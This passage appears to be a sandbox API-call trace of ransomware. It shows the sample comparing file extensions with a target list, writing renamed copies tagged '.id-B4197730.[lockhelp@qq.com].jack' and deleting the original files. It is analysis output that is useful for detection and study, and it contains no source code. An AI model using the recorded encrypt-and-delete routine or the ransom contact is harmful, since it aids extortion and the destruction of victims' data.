(lpFileName="C:\\588bce7c90097ed212\\1037\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1037\\localizeddata.xml")) returned 1 [0197.285] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\LocalizedData.xml") returned 44 [0197.285] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\LocalizedData.xml") returned 44 [0197.285] lstrlenW (lpString=".doc") returned 4 [0197.285] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0197.285] lstrlenW (lpString=".docx") returned 5 [0197.286] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0197.286] lstrlenW (lpString=".pdf") returned 4 [0197.286] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0197.286] lstrlenW (lpString=".xls") returned 4 [0197.286] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0197.286] lstrlenW (lpString=".xlsx") returned 5 [0197.286] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0197.286] lstrlenW (lpString=".ppt") returned 4 [0197.286] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0197.286] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\LocalizedData.xml") returned 44 [0197.286] lstrlenW (lpString=".zip") returned 4 [0197.286] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0197.286] lstrlenW (lpString=".rar") returned 4 [0197.286] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0197.286] lstrlenW (lpString=".bz2") returned 4 [0197.286] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0197.286] lstrlenW (lpString=".7z") returned 3 [0197.286] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0197.286] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\LocalizedData.xml") returned 44 [0197.286] lstrlenW (lpString=".dbf") returned 4 [0197.286] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0197.286] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\LocalizedData.xml") returned 44 [0197.286] lstrlenW (lpString=".1cd") returned 4 [0197.286] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0197.286] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\LocalizedData.xml") returned 44 [0197.286] lstrlenW (lpString=".jpg") returned 4 [0197.286] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0197.286] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\LocalizedData.xml") returned 44 [0197.287] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\LocalizedData.xml") returned 44 [0197.287] lstrlenW (lpString=".doc") returned 4 [0197.287] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0197.287] lstrlenW (lpString=".docx") returned 5 [0197.287] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0197.287] lstrlenW (lpString=".pdf") returned 4 [0197.287] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0197.287] lstrlenW (lpString=".xls") returned 4 [0197.287] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0197.287] lstrlenW (lpString=".xlsx") returned 5 [0197.287] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0197.287] lstrlenW (lpString=".ppt") returned 4 [0197.287] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0197.287] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\LocalizedData.xml") returned 44 [0197.287] lstrlenW (lpString=".zip") returned 4 [0197.287] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0197.287] lstrlenW (lpString=".rar") returned 4 [0197.287] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0197.287] lstrlenW (lpString=".bz2") returned 4 [0197.287] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0197.287] lstrlenW (lpString=".7z") returned 3 [0197.287] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0197.287] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\LocalizedData.xml") returned 44 [0197.287] lstrlenW (lpString=".dbf") returned 4 [0197.287] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0197.287] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\LocalizedData.xml") returned 44 [0197.287] lstrlenW (lpString=".1cd") returned 4 [0197.287] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0197.287] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\LocalizedData.xml") returned 44 [0197.287] lstrlenW (lpString=".jpg") returned 4 [0197.288] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0197.288] lstrcmpiW (lpString1=".rtf", lpString2=".jack") returned 1 [0197.288] lstrlenW (lpString="eula.rtf") returned 8 [0197.288] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1038\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1038\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3fc [0197.288] GetFileSizeEx (in: hFile=0x3fc, lpFileSize=0x391ff14 | out: lpFileSize=0x391ff14*=4254) returned 1 [0197.288] CloseHandle (hObject=0x3fc) returned 1 [0197.288] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1038\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1038\\eula.rtf")) returned 0x80 [0197.288] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1038\\eula.rtf.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1038\\eula.rtf.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0197.288] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1038\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1038\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3fc [0197.289] SetFilePointerEx (in: hFile=0x3fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.289] SetFilePointerEx (in: hFile=0x3fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.289] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1038\\eula.rtf.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1038\\eula.rtf.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x404 [0197.289] GetLastError () returned 0x0 [0197.289] ReadFile (in: hFile=0x3fc, lpBuffer=0x444e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x391fecc, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesRead=0x391fecc*=0x109e, lpOverlapped=0x0) returned 1 [0197.312] WriteFile (in: hFile=0x404, lpBuffer=0x444e020*, nNumberOfBytesToWrite=0x10a0, lpNumberOfBytesWritten=0x391fc94, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesWritten=0x391fc94*=0x10a0, lpOverlapped=0x0) returned 1 [0197.314] ReadFile (in: hFile=0x3fc, lpBuffer=0x444e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x391fecc, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesRead=0x391fecc*=0x0, lpOverlapped=0x0) returned 1 [0197.314] WriteFile (in: hFile=0x404, lpBuffer=0x444e020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x391fc94, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesWritten=0x391fc94*=0xe4, lpOverlapped=0x0) returned 1 [0197.315] SetEndOfFile (hFile=0x404) returned 1 [0197.315] CloseHandle (hObject=0x404) returned 1 [0197.315] SetFilePointerEx (in: hFile=0x3fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.316] SetEndOfFile (hFile=0x3fc) returned 1 [0197.316] CloseHandle (hObject=0x3fc) returned 1 [0197.317] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1038\\eula.rtf.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0197.317] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1038\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1038\\eula.rtf")) returned 1 [0197.317] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\eula.rtf") returned 35 [0197.317] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\eula.rtf") returned 35 [0197.317] lstrlenW (lpString=".doc") returned 4 [0197.317] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0197.317] lstrlenW (lpString=".docx") returned 5 [0197.317] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0197.317] lstrlenW (lpString=".pdf") returned 4 [0197.317] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0197.317] lstrlenW (lpString=".xls") returned 4 [0197.317] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0197.317] lstrlenW (lpString=".xlsx") returned 5 [0197.317] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0197.317] lstrlenW (lpString=".ppt") returned 4 [0197.318] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0197.318] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\eula.rtf") returned 35 [0197.318] lstrlenW (lpString=".zip") returned 4 [0197.318] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0197.318] lstrlenW (lpString=".rar") returned 4 [0197.318] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0197.318] lstrlenW (lpString=".bz2") returned 4 [0197.318] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0197.318] lstrlenW (lpString=".7z") returned 3 [0197.318] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0197.318] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\eula.rtf") returned 35 [0197.318] lstrlenW (lpString=".dbf") returned 4 [0197.318] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0197.318] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\eula.rtf") returned 35 [0197.318] lstrlenW (lpString=".1cd") returned 4 [0197.318] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0197.318] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\eula.rtf") returned 35 [0197.318] lstrlenW (lpString=".jpg") returned 4 [0197.318] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0197.318] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\eula.rtf") returned 35 [0197.318] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\eula.rtf") returned 35 [0197.318] lstrlenW (lpString=".doc") returned 4 [0197.318] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0197.318] lstrlenW (lpString=".docx") returned 5 [0197.318] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0197.318] lstrlenW (lpString=".pdf") returned 4 [0197.318] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0197.318] lstrlenW (lpString=".xls") returned 4 [0197.318] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0197.319] lstrlenW (lpString=".xlsx") returned 5 [0197.319] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0197.319] lstrlenW (lpString=".ppt") returned 4 [0197.319] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0197.319] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\eula.rtf") returned 35 [0197.319] lstrlenW (lpString=".zip") returned 4 [0197.319] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0197.319] lstrlenW (lpString=".rar") returned 4 [0197.319] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0197.319] lstrlenW (lpString=".bz2") returned 4 [0197.319] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0197.319] lstrlenW (lpString=".7z") returned 3 [0197.319] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0197.319] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\eula.rtf") returned 35 [0197.319] lstrlenW (lpString=".dbf") returned 4 [0197.319] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0197.319] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\eula.rtf") returned 35 [0197.319] lstrlenW (lpString=".1cd") returned 4 [0197.319] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0197.319] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\eula.rtf") returned 35 [0197.319] lstrlenW (lpString=".jpg") returned 4 [0197.319] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0197.319] lstrcmpiW (lpString1=".xml", lpString2=".jack") returned 1 [0197.319] lstrlenW (lpString="LocalizedData.xml") returned 17 [0197.320] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1038\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1038\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3fc [0197.320] GetFileSizeEx (in: hFile=0x3fc, lpFileSize=0x391ff14 | out: lpFileSize=0x391ff14*=86442) returned 1 [0197.320] CloseHandle (hObject=0x3fc) returned 1 [0197.320] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1038\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1038\\localizeddata.xml")) returned 0x80 [0197.320] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1038\\LocalizedData.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1038\\localizeddata.xml.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0197.320] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1038\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1038\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3fc [0197.320] SetFilePointerEx (in: hFile=0x3fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.320] SetFilePointerEx (in: hFile=0x3fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.320] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1038\\LocalizedData.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1038\\localizeddata.xml.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x404 [0197.321] GetLastError () returned 0x0 [0197.321] ReadFile (in: hFile=0x3fc, lpBuffer=0x444e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x391fecc, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesRead=0x391fecc*=0x151aa, lpOverlapped=0x0) returned 1 [0197.418] WriteFile (in: hFile=0x404, lpBuffer=0x444e020*, nNumberOfBytesToWrite=0x151b0, lpNumberOfBytesWritten=0x391fc94, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesWritten=0x391fc94*=0x151b0, lpOverlapped=0x0) returned 1 [0197.421] ReadFile (in: hFile=0x3fc, lpBuffer=0x444e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x391fecc, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesRead=0x391fecc*=0x0, lpOverlapped=0x0) returned 1 [0197.421] WriteFile (in: hFile=0x404, lpBuffer=0x444e020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x391fc94, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesWritten=0x391fc94*=0xf6, lpOverlapped=0x0) returned 1 [0197.421] SetEndOfFile (hFile=0x404) returned 1 [0197.421] CloseHandle (hObject=0x404) returned 1 [0197.424] SetFilePointerEx (in: hFile=0x3fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.424] SetEndOfFile (hFile=0x3fc) returned 1 [0197.425] CloseHandle (hObject=0x3fc) returned 1 [0197.426] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1038\\LocalizedData.xml.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0197.426] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1038\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1038\\localizeddata.xml")) returned 1 [0197.426] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\LocalizedData.xml") returned 44 [0197.426] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\LocalizedData.xml") returned 44 [0197.426] lstrlenW (lpString=".doc") returned 4 [0197.426] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0197.426] lstrlenW (lpString=".docx") returned 5 [0197.426] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0197.426] lstrlenW (lpString=".pdf") returned 4 [0197.426] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0197.426] lstrlenW (lpString=".xls") returned 4 [0197.427] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0197.427] lstrlenW (lpString=".xlsx") returned 5 [0197.427] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0197.427] lstrlenW (lpString=".ppt") returned 4 [0197.427] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0197.427] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\LocalizedData.xml") returned 44 [0197.427] lstrlenW (lpString=".zip") returned 4 [0197.427] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0197.427] lstrlenW (lpString=".rar") returned 4 [0197.427] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0197.427] lstrlenW (lpString=".bz2") returned 4 [0197.427] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0197.427] lstrlenW (lpString=".7z") returned 3 [0197.427] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0197.427] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\LocalizedData.xml") returned 44 [0197.427] lstrlenW (lpString=".dbf") returned 4 [0197.427] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0197.427] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\LocalizedData.xml") returned 44 [0197.427] lstrlenW (lpString=".1cd") returned 4 [0197.427] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0197.427] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\LocalizedData.xml") returned 44 [0197.427] lstrlenW (lpString=".jpg") returned 4 [0197.427] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0197.427] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\LocalizedData.xml") returned 44 [0197.427] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\LocalizedData.xml") returned 44 [0197.427] lstrlenW (lpString=".doc") returned 4 [0197.427] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0197.427] lstrlenW (lpString=".docx") returned 5 [0197.427] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0197.428] lstrlenW (lpString=".pdf") returned 4 [0197.428] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0197.428] lstrlenW (lpString=".xls") returned 4 [0197.428] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0197.428] lstrlenW (lpString=".xlsx") returned 5 [0197.428] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0197.428] lstrlenW (lpString=".ppt") returned 4 [0197.428] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0197.428] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\LocalizedData.xml") returned 44 [0197.428] lstrlenW (lpString=".zip") returned 4 [0197.428] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0197.428] lstrlenW (lpString=".rar") returned 4 [0197.428] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0197.428] lstrlenW (lpString=".bz2") returned 4 [0197.428] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0197.428] lstrlenW (lpString=".7z") returned 3 [0197.428] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0197.428] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\LocalizedData.xml") returned 44 [0197.428] lstrlenW (lpString=".dbf") returned 4 [0197.428] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0197.428] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\LocalizedData.xml") returned 44 [0197.428] lstrlenW (lpString=".1cd") returned 4 [0197.428] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0197.428] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\LocalizedData.xml") returned 44 [0197.428] lstrlenW (lpString=".jpg") returned 4 [0197.428] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0197.429] lstrcmpiW (lpString1=".rtf", lpString2=".jack") returned 1 [0197.429] lstrlenW (lpString="eula.rtf") returned 8 [0197.429] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1041\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1041\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3fc [0197.429] GetFileSizeEx (in: hFile=0x3fc, lpFileSize=0x391ff14 | out: lpFileSize=0x391ff14*=10125) returned 1 [0197.429] CloseHandle (hObject=0x3fc) returned 1 [0197.429] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1041\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1041\\eula.rtf")) returned 0x80 [0197.429] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1041\\eula.rtf.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1041\\eula.rtf.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0197.429] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1041\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1041\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3fc [0197.429] SetFilePointerEx (in: hFile=0x3fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.430] SetFilePointerEx (in: hFile=0x3fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.430] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1041\\eula.rtf.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1041\\eula.rtf.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x404 [0197.430] GetLastError () returned 0x0 [0197.430] ReadFile (in: hFile=0x3fc, lpBuffer=0x444e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x391fecc, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesRead=0x391fecc*=0x278d, lpOverlapped=0x0) returned 1 [0197.453] WriteFile (in: hFile=0x404, lpBuffer=0x444e020*, nNumberOfBytesToWrite=0x2790, lpNumberOfBytesWritten=0x391fc94, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesWritten=0x391fc94*=0x2790, lpOverlapped=0x0) returned 1 [0197.454] ReadFile (in: hFile=0x3fc, lpBuffer=0x444e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x391fecc, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesRead=0x391fecc*=0x0, lpOverlapped=0x0) returned 1 [0197.455] WriteFile (in: hFile=0x404, lpBuffer=0x444e020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x391fc94, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesWritten=0x391fc94*=0xe4, lpOverlapped=0x0) returned 1 [0197.455] SetEndOfFile (hFile=0x404) returned 1 [0197.455] CloseHandle (hObject=0x404) returned 1 [0197.456] SetFilePointerEx (in: hFile=0x3fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.456] SetEndOfFile (hFile=0x3fc) returned 1 [0197.457] CloseHandle (hObject=0x3fc) returned 1 [0197.457] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1041\\eula.rtf.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0197.457] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1041\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1041\\eula.rtf")) returned 1 [0197.457] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\eula.rtf") returned 35 [0197.457] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\eula.rtf") returned 35 [0197.457] lstrlenW (lpString=".doc") returned 4 [0197.457] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0197.457] lstrlenW (lpString=".docx") returned 5 [0197.457] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0197.457] lstrlenW (lpString=".pdf") returned 4 [0197.457] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0197.458] lstrlenW (lpString=".xls") returned 4 [0197.458] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0197.458] lstrlenW (lpString=".xlsx") returned 5 [0197.458] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0197.458] lstrlenW (lpString=".ppt") returned 4 [0197.458] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0197.458] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\eula.rtf") returned 35 [0197.458] lstrlenW (lpString=".zip") returned 4 [0197.458] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0197.458] lstrlenW (lpString=".rar") returned 4 [0197.458] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0197.458] lstrlenW (lpString=".bz2") returned 4 [0197.458] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0197.458] lstrlenW (lpString=".7z") returned 3 [0197.458] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0197.458] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\eula.rtf") returned 35 [0197.458] lstrlenW (lpString=".dbf") returned 4 [0197.458] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0197.458] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\eula.rtf") returned 35 [0197.458] lstrlenW (lpString=".1cd") returned 4 [0197.458] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0197.458] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\eula.rtf") returned 35 [0197.458] lstrlenW (lpString=".jpg") returned 4 [0197.458] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0197.458] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\eula.rtf") returned 35 [0197.458] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\eula.rtf") returned 35 [0197.458] lstrlenW (lpString=".doc") returned 4 [0197.458] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0197.458] lstrlenW (lpString=".docx") returned 5 [0197.459] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0197.459] lstrlenW (lpString=".pdf") returned 4 [0197.459] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0197.459] lstrlenW (lpString=".xls") returned 4 [0197.459] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0197.459] lstrlenW 